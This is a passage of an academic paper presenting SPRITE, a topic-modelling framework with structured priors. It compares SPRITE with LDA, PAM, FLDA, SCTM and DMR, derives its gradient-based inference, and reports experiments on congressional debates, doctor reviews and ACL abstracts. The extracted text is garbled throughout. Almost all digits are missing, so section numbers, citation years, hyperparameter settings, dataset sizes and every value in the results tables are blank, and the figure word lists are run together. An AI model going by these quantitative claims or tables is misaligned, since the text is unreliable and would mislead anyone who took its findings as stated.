zero, the mean could be a weighted combination of higher level weight vec- tors. this approach was used by paul and dredze ( ) in factorial lda, in which each ω compo- nent had its own gaussian prior provided as input to guide the parameters. special cases and extensions we now describe several existing dirichlet prior topic models and show how they are special cases of sprite. table summarizes these models and their relation to sprite. in almost every case, we also describe how the sprite representation of the model offers improvements over the original model or can lead to novel extensions. model sec. document priors topic priors lda . single component single component sctm . single component sparse binary β sage . single component sparse ω flda . binary δ is transpose of β factored binary β pam . α are supertopic weights single component dmr . α are feature values single component table : topic models with dirichlet priors that are gen- eralized by sprite. the description of each model can be found in the noted section number. pam is not equivalent, but captures very similar behavior. the described component formulations of sctm and sage are equivalent, but these differ from sprite in that the components directly define the parameters, rather than priors over the parameters. . latent dirichlet allocation in lda (blei et al., b), all θ vectors are drawn from the same prior, as are all φ vectors. this is a basic instance of our model with only one component at the topic and document levels, c(θ) = c(φ) = , with coefficients α = β = . . shared components topic models shared components topic models (sctm) (gorm- ley et al., ) define topics as products of “com- ponents”, where components are word distribu- tions. to use the notation of our paper, the kth topic’s word distribution in sctm is parameter- ized by φkv ∝ ∏ c ω βkc cv , where the ω vectors are word distributions (rather than vectors in rv ), and the βkc ∈ { , } variables are indicators denoting whether component c is in topic k. this is closely related to sprite, where top- ics also depend on products of underlying com- ponents. a major difference is that in sctm, the topic-specific word distributions are exactly defined as a product of components, whereas in sprite, it is only the prior that is a product of components. another difference is that sctm has an unweighted product of components (β is bi- nary), whereas sprite allows for weighted prod- ucts. the log-linear parameterization leads to sim- pler optimization procedures than the product pa- rameterization. finally, the components in sctm only apply to the word distributions, and not the topic distributions in documents. . factored topic models factored topic models combine multiple aspects of the text to generate the document (instead of just topics). one such topic model is factorial lda (flda) (paul and dredze, ). in flda, the posterior becomes concentrated around the prior when the dirichlet variance is low, in which case sprite be- haves like sctm. sprite is therefore more general. “topics” are actually tuples of potentially multiple variables, such as aspect and sentiment in online reviews (paul et al., ). each document distri- bution θm is a distribution over pairs (or higher- dimensional tuples if there are more than two fac- tors), and each pair (j,k) has a word distribu- tion φ(j,k). flda uses a similar log-linear pa- rameterization of the dirichlet priors as sprite. using our notation, the dirichlet(φ̃(j,k)) prior for φ(j,k) is defined as φ̃(j,k),v=exp(ωjv+ωkv), where ωj is a weight vector over the vocabulary for the jth component of the first factor, and ωk encodes the weights for the kth component of the second factor. (some bias terms are omitted for sim- plicity.) the prior over θm has a similar form: θ̃m,(j,k)=exp(αmj + αmk), where αmj is docu- ment m’s preference for component j of the first factor (and likewise for k of the second). this corresponds to an instantiation of sprite using an unweighted factored forest (§ . . ), where βzc = δcz (§ . , recall that δ are document components while β are the topic coefficients). each subtopic z (which is a pair of variables in the two-factor model) has one parent component from each factor, indicated by βz which is binary- valued. at the document level in the two-factor example, δj is an indicator vector with values of for all pairs with j as the first component, and thus the coefficient αmj controls the prior for all such pairs of the form (j, ·), and likewise δk indicates pairs with k as the second component, controlling the prior over (·,k). the sprite representation offers a benefit over the original flda model. flda assumes that the entire cartesian product of the different factors is represented in the model (e.g. φ parameters for ev- ery possible tuple), which leads to issues with effi- ciency and overparameterization with higher num- bers of factors. with sprite, we can simply fix the number of “topics” to a number smaller than the size of the cartesian product, and the model will learn which subset of tuples are included, through the values of β and δ. finally, another existing model family that al- lows for topic factorization is the sparse additive generative model (sage) (eisenstein et al., ). sage uses a log-linear parameterization to define word distributions. sage is a general family of models that need not be factored, but is presented as an efficient solution for including multiple fac- tors, such as topic and geography or topic and au- thor ideology. like sctm, φ is exactly defined as a product of ω weights, rather than our approach of using the product to define a prior over φ. . topic hierarchies and correlations while the two previous subsections primarily fo- cused on word distributions (with flda being an exception that focused on both), sprite’s priors over topic distributions also have useful charac- teristics. the component-specific δ vectors can be interpreted as common topic distribution pat- terns, where each component is likely to give high weight to groups of topics that tend to occur to- gether. each document’s α weights encode which of the topic groups are present in that document. similar properties are captured by the pachinko allocation model (pam) (li and mccallum, ). under pam, each document has a distri- bution over supertopics. each supertopic is as- sociated with a dirichlet prior over subtopic dis- tributions, where subtopics are the low level top- ics that are associated with word parameters φ. documents also have supertopic-specific distribu- tions over subtopics (drawn from each supertopic- specific dirichlet prior). each topic in a document is drawn by first drawing a supertopic from the document’s distribution, then drawing a subtopic from that supertopic’s document distribution. while not equivalent, this is quite similar to sprite where document components correspond to supertopics. each document’s α weights can be interpreted to be similar to a distribution over supertopics, and each δ vector is that supertopic’s contribution to the prior over subtopics. the prior over the document’s topic distribution is thus af- fected by the document’s supertopic weights α. the sprite formulation naturally allows for powerful extensions to pam. one possibility is to include topic components for the word distri- butions, in addition to document components, and to tie together δcz and βzc (§ . ). this models the intuitive characteristic that subtopics belonging to similar supertopics (encoded by δ) should come from similar priors over their word distributions (since they will have similar β values). that is, children of a supertopic are topically related – they are likely to share words. this is a richer alterna- tive to the hierarchical variant of pam proposed by mimno et al. ( ), which modeled separate word distributions for supertopics and subtopics, but the subtopics were not dependent on the super- topic word distributions. another extension is to form a strict tree structure, making each subtopic belong to exactly one supertopic: a true hierarchy. . conditioning on document attributes sprite also naturally provides the ability to con- dition document topic distributions on features of the document, such as a user rating in a review. to do this, let the number of document compo- nents be the number of features, and the value of αmc is the mth document’s value of the cth fea- ture. the δ vectors then influence the document’s topic prior based on the feature values. for exam- ple, increasing αmc will increase the prior for topic z if δcz is positive and decrease the prior if δcz is negative. this is similar to the structure used for pam (§ . ), but here the α weights are fixed and provided as input, rather than learned and inter- preted as supertopic weights. this is identical to the dirichlet-multinomial regression (dmr) topic model (mimno and mccallum, ). the dmr topic model define’s each document’s dirichlet prior over topics as a log-linear function of the document’s feature values and regression coeffi- cients for each topic. the cth feature’s regression coefficients correspond to the δc vector in sprite. inference and parameter estimation we now discuss how to infer the posterior of the latent variables z and parameters θ and φ, and find maximum a posteriori (map) estimates of the hy- perparameters α, β, δ, and ω, given their hyperpri- ors. we take a monte carlo em approach, using a collapsed gibbs sampler to sample from the pos- terior of the topic assignments z conditioned on the hyperparameters, then optimizing the hyperpa- rameters using gradient-based optimization condi- tioned on the samples. given the hyperparameters, the sampling equa- tions are identical to the standard lda sampler (griffiths and steyvers, ). the partial deriva- tive of the collapsed log likelihood l of the corpus with respect to each hyperparameter βkc is: ∂l ∂βkc = ∂p(β) ∂βkc + ∑ v ωcvφ̃kv × ( )( Ψ(n k v +φ̃kv) −Ψ(φ̃kv) +Ψ( ∑ k′φ̃k′v) −Ψ( ∑ k′n k′ v +φ̃k′v) ) where φ̃kv=exp( ∑ c′ βkc′ωc′v), n k v is the number of times word v is assigned to topic k (in the samples from the e-step), and Ψ is the digamma function, the derivative of the log of the gamma function. the digamma terms arise from the dirichlet-multinomial distribution, when integrat- ing out the parameters φ. p(β) is the hyperprior. for a -mean gaussian hyperprior with variance σ , ∂p(β) ∂βkc = −βkc σ . under a dirchlet(ρ) hyper- prior, when we want β to represent an indicator vector (§ . . ), ∂p(β) ∂βkc = ρ− βkc . the partial derivatives for the other hyperpa- rameters are similar. rather than involving a sum over the vocabulary, ∂l ∂δck sums over documents, while ∂l ∂ωcv and ∂l ∂αmc sum over topics. our inference algorithm alternates between one gibbs iteration and one iteration of gradient as- cent, so that the parameters change gradually. for unconstrained parameters, we use the update rule: xt+ =xt + ηt∇l(xt), for some variable x and a step size ηt at iteration t. for parameters con- strained to the simplex (such as when β is a soft indicator vector), we use exponentiated gradient ascent (kivinen and warmuth, ) with the up- date rule: xt+ i ∝ x t i exp(ηt∇il(x t)). . tightening the constraints for variables that we prefer to be binary but have softened to continuous variables using sparse beta or dirichlet priors, we can straightforwardly strengthen the preference to be binary by modify- ing the objective function to favor the prior more heavily. specifically, under a dirichlet(ρ< ) prior we will introduce a scaling parameter τt ≥ to the prior log likelihood: τt log p(β) with par- tial derivative τt ρ− βkc , which adds extra weight to the sparse dirichlet prior in the objective. the algorithm used in our experiments begins with τ = and optionally increases τ over time. this is a deterministic annealing approach, where τ corresponds to an inverse temperature (ueda and nakano, ; smith and eisner, ). as τ approaches infinity, the prior-annealed map objective maxβ p(φ|β)p(β)τ approaches maxβ p(φ|β) maxβ p(β). annealing only the prior p(β) results in maximization of this term only, while the outer max chooses a good β under p(φ|β) as a tie-breaker among all β values that maximize the inner max (binary-valued β). we show experimentally (§ . . ) that annealing the prior yields values that satisfy the constraints. other modifications could be made to the objective func- tion to induce sparsity, such as entropy regularization (bala- subramanyan and cohen, ). a factored hierarchical model of topic and perspective we will now describe a sprite model that en- compasses nearly all of the structures and exten- sions described in § – , followed by experimen- tal results using this model to jointly capture topic and “perspective” in a corpus of political debates (where perspective corresponds to ideology) and a corpus of online doctor reviews (where perspec- tive corresponds to the review sentiment). first, we will create a topic hierarchy (§ . ). the hierarchy will model both topics and docu- ments, where αm is document m’s supertopic pro- portions, δc is the cth supertopic’s subtopic prior, ωc is the cth supertopic’s word prior, and βk is the weight vector that selects the kth topic’s par- ent supertopic, which incorporates (soft) indicator vectors to encode a tree structure (§ . . ). we want a weighted tree; while each βk has only one nonzero element, the nonzero element can be a value other than . we do this by replac- ing the single coefficient βkc with a product of two variables: bkcβ̂kc. here, β̂k is a real-valued weight vector, while bkc is a binary indicator vector which zeroes out all but one element of βk. we do the same with the δ vectors, replacing δck with bkcδ̂ck. the b variables are shared across both topic and document components, which is how we tie these together (§ . ). we relax the binary requirement and instead allow a positive real-valued vector whose elements sum to , with a dirichlet(ρ< ) prior to encourage sparsity (§ . . ). to be properly interpreted as a hierarchy, we constrain the coefficients α and β (and by ex- tension, δ) to be positive. to optimize these pa- rameters in a mathematically convenient way, we write βkc as exp(log βkc), and instead optimize log βkc ∈ r rather than βkc ∈ r+. second, we factorize (§ . ) our hierarchy such that each topic depends not only on its supertopic, but also on a value indicating perspective. for ex- ample, a conservative topic about energy will ap- pear differently from a liberal topic about energy. the prior for a topic will be a log-linear combina- tion of both a supertopic (e.g. energy) and a per- spective (e.g. liberal) weight vector. the variables associated with the perspective component are de- noted with superscript (p) rather than subscript c. to learn meaningful perspective parameters, we include supervision in the form of document at- tributes (§ . ). each document includes a pos- • bk ∼ dirichlet(ρ < ) (soft indicator) • α(p) is given as input (perspective value) • δ(p)k = β (p) k • φ̃kv = exp(ω (b) v +β (p) k ω (p) v + ∑ c bkcβ̂kcωcv) • θ̃mk = exp(δ (b) k +α (p) m δ (p) k + ∑ c bkcαmcδ̂ck) figure : summary of the hyperparameters in our sprite- based topic and perspective model (§ ). itive or negative score denoting the perspective, which is the variable α(p)m for document m. since α(p) are the coefficients for δ(p), positive values of δ(p)k indicate that topic k is more likely if the au- thor is conservative (which has a positive α score in our data), and less likely if the author is liberal (which has a negative score). there is only a single perspective component, but it represents two ends of a spectrum with positive and negative weights; β(p) and δ(p) are not constrained to be positive, unlike the supertopics. we also set β(p)k = δ (p) k . this means that topics with positive δ(p)k will also have a positive β coefficient that is multiplied with the perspective word vector ω(p). finally, we include “bias” component vectors denoted ω(b) and δ(b), which act as overall weights over the vocabulary and topics, so that the component-specific ω and δ weights can be inter- preted as deviations from the global bias weights. figure summarizes the model. this includes most of the features described above (trees, fac- tored structures, tying topic and document compo- nents, and document attributes), so we can ablate model features to measure their effect. experiments . datasets and experimental setup we applied our models to two corpora: • debates: a set of floor debates from the th– th u.s. congress, collected by nguyen et al. ( ), who also applied a hierarchical topic model to this data. each document is a tran- script of one speaker’s turn in a debate, and each document includes the first dimension of the dw-nominate score (lewis and poole, ), a real-valued score indicating how conservative (positive) or liberal (negative) the speaker is. this value is α(p). we took a sample of , documents from the house debates ( , to- kens; , types), balanced across party affilia- tion. we sampled from the most partisan speak- ers, removing scores below the median value. • reviews: doctor reviews from ratemds.com, previously analyzed using flda (paul et al., ; wallace et al., ). the reviews con- tain ratings on a – scale for multiple aspects. we centered the ratings around the middle value , then took reviews that had the same sign for all aspects, and averaged the scores to produce a value for α(p). our corpus contains , documents ( , tokens; , types), bal- anced across positive/negative scores. unless otherwise specified, k= topics and c= components (excluding the perspective component) for debates, and k= and c= for reviews. these values were chosen as a qualita- tive preference, not optimized for predictive per- formance, but we experiment with different values in § . . . we set the step size ηt according to ada- grad (duchi et al., ), where the step size is the inverse of the sum of squared historical gradi- ents. we place a sparse dirichlet(ρ= . ) prior on the b variables, and apply weak regulariza- tion to all other hyperparameters via a n( , ) prior. these hyperparameters were chosen after only minimal tuning, and were selected because they showed stable and reasonable output qualita- tively during preliminary development. we ran our inference algorithm for itera- tions, estimating the parameters θ and φ by aver- aging the final iterations. our results are aver- aged across randomly initialized samplers. . evaluating the topic perspective model . . analysis of output figure shows examples of topics learned from the reviews corpus. the figure includes the high- est probability words in various topics as well as the highest weight words in the supertopic com- ponents and perspective component, which feed into the priors over the topic parameters. we see that one supertopic includes many words related to surgery, such as procedure and performed, and has multiple children, including a topic about dental work. another supertopic includes words describ- ing family members such as kids and husband. adagrad decayed too quickly for the b variables. for these, we used a variant suggested by zeiler ( ) which uses an average of historical gradients rather than a sum. our code and the data will be available at: http://cs.jhu.edu/˜mpaul. one topic has both supertopics as parents, which appears to describe surgeries that saved a family member’s life, with top words including {saved, life, husband, cancer}. the figure also illustrates which topics are associated more with positive or negative reviews, as indicated by the value of δ(p). interpretable parameters were also learned from the debates corpus. consider two topics about energy that have polar values of δ(p). the conservative-leaning topic is about oil and gas, with top words including {oil, gas, companies, prices, drilling}. the liberal-leaning topic is about renewable energy, with top words includ- ing {energy, new, technology, future, renewable}. both of these topics share a common parent of an industry-related supertopic whose top words are {industry, companies, market, price}. a nonparti- san topic under this same supertopic has top words {credit, financial, loan, mortgage, loans}. . . quantitative evaluation we evaluated the model on two predictive tasks as well as topic quality. the first metric is perplex- ity of held-out text. the held-out set is based on tokens rather than documents: we trained on even numbered tokens and tested on odd tokens. this is a type of “document completion” evaluation (wal- lach et al., b) which measures how well the model can predict held-out tokens of a document after observing only some. we also evaluated how well the model can pre- dict the attribute value (dw-nominate score or user rating) of the document. we trained a linear regression model using the document topic distri- butions θ as features. we held out half of the docu- ments for testing and measured the mean absolute error. when estimating document-specific sprite parameters for held-out documents, we fix the fea- ture value α(p)m = for that document. these predictive experiments do not directly measure performance at many of the particular tasks that topic models are well suited for, like data exploration, summarization, and visualiza- tion. we therefore also include a metric that more directly measures the quality and interpretability of topics. we use the topic coherence metric intro- duced by mimno et al. ( ), which is based on co-occurrence statistics among each topic’s most probable words and has been shown to correlate with human judgments of topic quality. this met- ric measures the quality of each topic, and we best! love! years! caring! children! really! wonderful! hes! great! family! comfortable! listens! thank! amazing! …! …! went! pay! later! staff! asked! money! company! refused! pain! office! didn’t! said! told! doctor! surgery! pain! went! dr! surgeon! told! procedure! months! performed! removed! left! fix! said! later! years! dr! life! thank! saved! god! husband! heart! cancer! years! helped! doctors! hospital! father! man! able! told! hospital! dr! blood! went! later! days! mother! said! er! cancer! weight! home! father! months! dentist! teeth! dental! work! tooth! root! mouth! pain! dentists! went! filling! canal! dr! crown! cleaning! dr! best! children! years! kids! cares! hes! care! old! daughter! child! husband! family! pediatrician! trust! baby! son! pregnancy! dr! child! pregnant! ob! daughter! first! delivered! gyn! birth! delivery! section! hospital! dr! best! years! doctor! love! cares! ive! children! patients! hes! family! kids! seen! doctors! son! pain! surgery! dr! went! knee! foot! neck! mri! injury! shoulder! bone! months! told! surgeon! therapy! perspective! “surgery”! “family”! figure : examples of topics (gray boxes) and components (colored boxes) learned on the reviews corpus with topics and components. words with the highest and lowest values of ω(p), the perspective component, are shown on the left, reflecting positive and negative sentiment words. the words with largest ω values in two supertopic components are also shown, with manually given labels. arrows from components to topics indicate that the topic’s word distribution draws from that component in its prior (with non-zero β value). there are also implicit arrows from the perspective component to all topics (omitted for clarity). the vertical positions of topics reflect the topic’s perspective value δ(p). topics centered above the middle line are more likely to occur in reviews with positive scores, while topics below the middle line are more likely in negative reviews. note that this is a “soft” hierarchy because the tree structure is not strictly enforced, so some topics have multiple parent components. table shows how strict trees can be learned by tuning the annealing parameter. measure the average coherence across all topics: k k∑ k= m∑ m= m− ∑ l= log df(vkm,vkl) + df(vkl) ( ) where df(v,w) is the document frequency of words v and w (the number of documents in which they both occur), df(v) is the document fre- quency of word v, and vki is the ith most probable word in topic k. we use the top m = words. this metric is limited to measuring only the qual- ity of word clusters, ignoring the potentially im- proved interpretability of organizing the data into certain structures. however, it is still useful as an alternative measure of performance and utility, in- dependent of the models’ predictive abilities. using these three metrics, we compared to sev- eral variants (denoted in bold) of the full model to understand how the different parts of the model affect performance: • variants that contain the hierarchy components but not the perspective component (hierarchy only), and vice versa (perspective only). • the “hierarchy only” model using only docu- ment components δ and no topic components. this is a pam-style model because it exhibits similar behavior to pam (§ . ). we also com- pared to the original pam model. • the “hierarchy only” model using only topic components ω and no document components. this is a sctm-style model because it exhibits similar behavior to sctm (§ . ). • the full model where α(p) is learned rather than given as input. this is a flda-style model that has similar behavior to flda (§ . ). we also compared to the original flda model. • the “perspective only” model but without the ω(p) topic component, so the attribute value af- fects only the topic distributions and not the word distributions. this is identical to the dmr model of mimno and mccallum ( ) (§ . ). • a model with no components except for the bias vectors ω(b) and δ(b). this is equiva- lent to lda with optimized hyperparameters (learned). we also experimented with using fixed symmetric hyperparameters, using val- ues suggested by griffiths and steyvers ( ): /k and . for topic and word distributions. to put the results in context, we also compare to two types of baselines: ( ) “bag of words” base- lines, where we measure the perplexity of add-one smoothed unigram language models, we measure debates reviews model perplexity prediction error coherence perplexity prediction error coherence full model † . ± . † . ± . - . ± . † . ± . † . ± . - . ± . hierarchy only † . ± . . ± . - . ± . † . ± . † . ± . - . ± . perspective only † . ± . † . ± . - . ± . † . ± . † . ± . - . ± . sctm-style . ± . . ± . †- . ± . . ± . † . ± . †- . ± . pam-style † . ± . . ± . - . ± . † . ± . † . ± . - . ± . flda-style † . ± . . ± . - . ± . † . ± . † . ± . - . ± . dmr . ± . . ± . - . ± . † . ± . † . ± . - . ± . pam . ± . . ± . †- . ± . . ± . † . ± . †- . ± . flda . ± . . ± . - . ± . . ± . . ± . - . ± . lda (learned) . ± . . ± . - . ± . . ± . . ± . - . ± . lda (fixed) . ± . . ± . - . ± . . ± . . ± . - . ± . bag of words . ± . . ± . †- . ± . . ± . . ± . †- . ± . naive baseline . ± . . ± . - . ± . . ± . . ± . - . ± . table : perplexity of held-out tokens and mean absolute error for attribute prediction using various models (± std. error). † indicates significant improvement (p < . ) over optimized lda under a two-sided t-test. the prediction error using bag of words features, and we measure coherence of the unigram distri- bution; ( ) naive baselines, where we measure the perplexity of the uniform distribution over each dataset’s vocabulary, the prediction error when simply predicting each attribute as the mean value in the training set, and the coherence of ran- domly selected words (repeated for trials). table shows that the full sprite model sub- stantially outperforms the lda baseline at both predictive tasks. generally, model variants with more structure perform better predictively. the difference between sctm-style and pam-style is that the former uses only topic com- ponents (for word distributions) and the latter uses only document components (for the topic distri- butions). results show that the structured priors are more important for topic than word distribu- tions, since pam-style has lower perplexity on both datasets. however, models with both topic and document components generally outperform either alone, including comparing the perspec- tive only and dmr models. the former includes both topic and document perspective components, while dmr has only a document level component. pam does not significantly outperform opti- mized lda in most measures, likely because it up- dates the hyperparameters using a moment-based approximation, which is less accurate than our gradient-based optimization. flda perplexity is . % higher than optimized lda on reviews, comparable to the % reported by paul and dredze ( ) on a different corpus. the flda-style sprite variant, which is more flexible, signifi- cantly outperforms flda in most measures. the results are quite different under the co- herence metric. it seems that topic components (which influence the word distributions) improve coherence over lda, while document compo- nents worsen coherence. sctm-style (which uses only topic components) does the best in both datasets, while pam-style (which uses only doc- uments) does the worst. pam also significantly improves over lda, despite worse perplexity. the lda (learned) baseline substantially out- performs lda (fixed) in all cases, highlighting the importance of optimizing hyperparameters, con- sistent with prior research (wallach et al., a). surprisingly, many sprite variants also outper- form the bag of words regression baseline, even though the latter was tuned to optimize perfor- mance using heavy ` regularization, which we applied only weakly (without tuning) to the topic model features. we also point out that the “bag of words” version of the coherence metric (the co- herence of the top words) is higher than the av- erage topic coherence, which is an artifact of how the metric is defined: the most probable words in the corpus also tend to co-occur together in most documents, so these words are considered to be highly coherent when grouped together. parameter sensitivity we evaluated the full model at the two predictive tasks with varying numbers of topics ({ , , , } for debates and { , , , } for reviews) and components ({ , , , }). figure shows that performance is more sensitive to the number of topics than com- ponents, with generally less variance among the latter. more topics improve performance mono- tonically on debates, while performance declines at topics on reviews. the middle range of com- ponents ( – ) tends to perform better than too few ( ) or too many ( ) components. regardless of quantitative differences, the p er pl ex ity debates k= k= k= k= reviews k= k= k= k= number of components . . . . . . p re di ct io n er ro r number of components . . . . . figure : predictive performance of full model with differ- ent numbers of topics k across different numbers of compo- nents, represented on the x-axis (log scale). τt debates reviews . (sparse dag) . % . % . (soft tree) . % . % . t (hard tree) . % . % . t (hard tree) % % table : the percentage of indicator values that are sparse (near or ) when using different annealing schedules. choice of parameters may depend on the end ap- plication and the particular structures that the user has in mind, if interpretability is important. for example, if the topic model is used as a visual- ization tool, then components would not likely result in an interesting hierarchy to the user, even if this setting produces low perplexity. structured sparsity we use a relaxation of the binary b that induces a “soft” tree structure. ta- ble shows the percentage of b values which are within � = . of or under various anneal- ing schedules, increasing the inverse temperature τ by . % after each iteration (i.e. τt = . t) as well as . % and no annealing at all (τ = ). at τ = , we model a dag rather than a tree, be- cause the model has no preference that b is sparse. many of the values are binary in the dag case, but the sparse prior substantially increases the number of binary values, obtaining fully binary structures with sufficient annealing. we compare the dag and tree structures more in the next subsection. . structure comparison the previous subsection experimented with mod- els that included a variety of structures, but did not provide a comparison of each structure in iso- lation, since most model variants were part of a complex joint model. in this section, we exper- iment with the basic sprite model for the three structures described in § : a dag, a tree, and a factored forest. for each structure, we also exper- iment with each type of component: document, topic, and both types (combined). for this set of experiments, we included a third dataset that does not contain a perspective value: • abstracts: a set of abstracts from the acl anthology ( , tokens; , types). these abstracts have previously been analyzed with flda (paul and dredze, ), so we include it here to see if the factored structure that we explore in this section learns similar patterns. based on our sparsity experiments in the pre- vious subsection, we set τt = . t to induce hard structures (tree and factored) and τ = to in- duce a dag. we keep the same parameters as the previous subsection: k= and c= for debates and k= and c= for reviews. for the factored structures, we use two factors, with one factor hav- ing more components than the other: and com- ponents for debates, and and components for reviews (the total number of components across the two factors is therefore the same as for the dag and tree experiments). the abstracts exper- iments use the same parameters as with debates. since the abstracts dataset does not have a per- spective value to predict, we do not include predic- tion error as a metric, instead focusing on held-out perplexity and topic coherence (eq. ). table shows the results of these two metrics. some trends are clear and consistent. topic components always hurt perplexity, while these components typically improve coherence, as was observed in the previous subsection. it has pre- viously been observed that perplexity and topic quality are not correlated (chang et al., ). these results show that the choice of components depends on the task at hand. combining the two components tends to produce results somewhere in between, suggesting that using both component types is a reasonable “default” setting. document components usually improve per- plexity, likely due to the nature of the document completion setup, in which half of each document is held out. the document components capture correlations between topics, so by inferring the components that generated the first half of the doc- ument, the prior is adjusted to give more probabil- ity to topics that are likely to occur in the unseen second half. another interesting trend is that the perplexity coherence dag tree factored dag tree factored debates document . ± . . ± . . ± . - . ± . - . ± . - . ± . topic . ± . . ± . . ± . - . ± . - . ± . - . ± . combined . ± . . ± . . ± . - . ± . - . ± . - . ± . reviews document . ± . . ± . . ± . - . ± . - . ± . - . ± . topic . ± . . ± . . ± . - . ± . - . ± . - . ± . combined . ± . . ± . . ± . - . ± . - . ± . - . ± . abstracts document . ± . . ± . . ± . - . ± . - . ± . - . ± . topic . ± . . ± . . ± . - . ± . - . ± . - . ± . combined . ± . . ± . . ± . - . ± . - . ± . - . ± . table : quantitative results for different structures (columns) and different components (rows) for two metrics (± std. error) across three datasets. the best (structure, component) pair for each dataset and metric is in bold. factored structure tends to perform well under both metrics, with the lowest perplexity and highest co- herence in a majority of the nine comparisons (i.e. each row). perhaps the models are capturing a nat- ural factorization present in the data. to understand the factored structure qualita- tively, figure shows examples of components from each factor along with example topics that draw from all pairs of these components, learned on abstracts. we find that the factor with the smaller number of components (left of the figure) seems to decompose into components represent- ing the major themes or disciplines found in acl abstracts, with one component expressing compu- tational approaches (top) and the other expressing linguistic theory (bottom). the third component (not shown) has words associated with speech, in- cluding {spoken, speech, recognition}. the factor shown on the right seems to decom- pose into different research topics: one compo- nent represents semantics (top), another syntax (bottom), with others including morphology (top words including {segmentation, chinese, morphol- ogy}) and information retrieval (top words includ- ing {documents, retrieval, ir}). many of the topics intuitively follow from the components of these two factors. for example, the two topics expressing vector space models and distributional semantics (top left and right) both draw from the “computational” and “semantics” components, while the topics expressing ontolo- gies and question answering (middle left and right) draw from “linguistics” and “semantics”. the factorization is similar to what had been previously been induced by flda. figure of paul and dredze ( ) shows components that look similar to the computational methods and linguistic theory components here, and the factor with the largest number of components also de- composes by research topic. these results show that sprite is capable of recovering similar struc- tures as flda, a more specialized model. sprite is also much more flexible than flda. while flda strictly models a one-to-one mapping of topics to each pair of components, sprite allows multiple topics to belong to the same pair (as in the semantics examples above), and conversely sprite does not require that all pairs have an as- sociated topic. this property allows sprite to scale to larger numbers of factors than flda, be- cause the number of topics is not required to grow with the number of all possible tuples. related work our topic and perspective model is related to su- pervised hierarchical lda (shlda) (nguyen et al., ), which learns a topic hierarchy while also learning regression parameters to associate topics with feature values such as political per- spective. this model does not explicitly incorpo- rate perspective-specific word priors into the top- ics (as in our factorized approach). the regression structure is also different. shlda is a “down- stream” model, where the perspective value is a re- sponse variable conditioned on the topics. in con- trast, sprite is an “upstream” model, where the topics are conditioned on the perspective value. we argue that the latter is more accurate as a gen- erative story (the emitted words depend on the author’s perspective, not the other way around). moreover, in our model the perspective influences both the word and topic distributions (through the topic and document components, respectively). inverse regression topic models (rabinovich and blei, ) use document feature values (such as political ideology) to alter the parameters of the method! words! word! corpus! learning! performance! approaches! training! proposed! based! “linguistics”! grammar! parsing! representation! structure! grammars! parse! syntax! representations! semantics! formalism! semantic! knowledge! domain! ontology! systems! words! information! wordnet! question! dialogue! parse! treebank! parser! penn! parsers! trees! dependencies! acoustic! corpus! parsing! training! learning! corpus! large! unsupervised! corpora! method! data! semantic! knowledge! semantics! ontology! relations! lexical! concepts! concept! similarity! words! word! vector! semantic! similar! based! method! words! corpus! word! multiword! paper! based! frequency! expressions! question! questions! answer! answering! answers! qa! systems! type! parsing! parser! parse! treebank! grammar! tree! trees! structure! german! languages! french! english! multilingual! italian! structure! spanish! “computational”! “semantics”! “syntax”! figure : examples of topics (gray boxes) and components (colored boxes) learned on the abstracts corpus with topics using a factored structure. the components have been grouped into two factors, one factor with components (left) and one with (right), with two examples shown from each. each topic prior draws from exactly one component from each factor. topic-specific word distributions. this is an alter- native to the more common approach to regression based topic modeling, where the variables affect the topic distributions rather than the word distri- butions. our sprite-based model does both: the document features adjust the prior over topic dis- tributions (through δ), but by tying together the document and topic components (with β), the doc- ument features also affect the prior over word dis- tributions. to the best of our knowledge, this is the first topic model to condition both topic and word distributions on the same features. the topic aspect model (paul and girju, a) is also a two-dimensional factored model that has been used to jointly model topic and perspective (paul and girju, b). however, this model does not use structured priors over the parameters, unlike most of the models discussed in § . an alternative approach to incorporating user preferences and expertise are interactive topic models (hu et al., ), a complimentary ap- proach to sprite. discussion and conclusion we have presented sprite, a family of topic mod- els that utilize structured priors to induce pre- ferred topic structures. specific instantiations of sprite are similar or equivalent to several exist- ing topic models. we demonstrated the utility of sprite by constructing a single model with many different characteristics, including a topic hierar- chy, a factorization of topic and perspective, and supervision in the form of document attributes. these structures were incorporated into the pri- ors of both the word and topic distributions, unlike most prior work that considered one or the other. our experiments explored how each of these var- ious model features affect performance, and our results showed that models with structured priors perform better than baseline lda models. our framework has made clear advancements with respect to existing structured topic models. for example, sprite is more general and of- fers simpler inference than the shared compo- nents topic model (gormley et al., ), and sprite allows for more flexible and scalable fac- tored structures than flda, as described in earlier sections. both of these models were motivated by their ability to learn interesting structures, rather than their performance at any predictive task. sim- ilarly, our goal in this study was not to provide state of the art results for a particular task, but to demonstrate a framework for learning struc- tures that are richer than previous structured mod- els. therefore, our experiments focused on un- derstanding how sprite compares to commonly used models with similar structures, and how the different variants compare under different metrics. ultimately, the model design choice depends on the application and the user needs. by unifying such a wide variety of topic models, sprite can serve as a common framework for enabling model exploration and bringing application-specific pref- erences and structure into topic models. acknowledgments we thank jason eisner and hanna wallach for helpful discussions, and viet-an nguyen for pro- viding the congressional debates data. michael paul is supported by a microsoft research phd fellowship. references d. andrzejewski, x. zhu, and m. craven. . in- corporating domain knowledge into topic modeling via dirichlet forest priors. in icml. r. balasubramanyan and w. cohen. . regular- ization of latent variable models to obtain sparsity. in siam conference on data mining. d. blei and j. lafferty. . a correlated topic model of science. annals of applied statistics, ( ): – . d. blei, t. griffiths, m. jordan, and j. tenenbaum. a. hierarchical topic models and the nested chinese restaurant process. in nips. d. blei, a. ng, and m. jordan. b. latent dirichlet allocation. jmlr. j. chang, j. boyd-graber, s. gerrish, c. wang, and d. blei. . reading tea leaves: how humans interpret topic models. in nips. j. duchi, e. hazan, and y. singer. . adaptive sub- gradient methods for online learning and stochastic optimization. jmlr, : – . j. eisenstein, a. ahmed, and e. p. xing. . sparse additive generative models of text. in icml. m.r. gormley, m. dredze, b. van durme, and j. eis- ner. . shared components topic models. in naacl. t. griffiths and m. steyvers. . finding scientific topics. in proceedings of the national academy of sciences of the united states of america. y. hu, j. boyd-graber, b. satinoff, and a. smith. . interactive topic modeling. machine learn- ing, : – . j. kivinen and m.k. warmuth. . exponentiated gradient versus gradient descent for linear predic- tors. information and computation, : – . j.b. lewis and k.t. poole. . measuring bias and uncertainty in ideal point estimates via the paramet- ric bootstrap. political analysis, ( ): – . w. li and a. mccallum. . pachinko alloca- tion: dag-structured mixture models of topic cor- relations. in international conference on machine learning. d. mimno and a. mccallum. . topic mod- els conditioned on arbitrary features with dirichlet- multinomial regression. in uai. d. mimno, w. li, and a. mccallum. . mixtures of hierarchical topics with pachinko allocation. in international conference on machine learning. 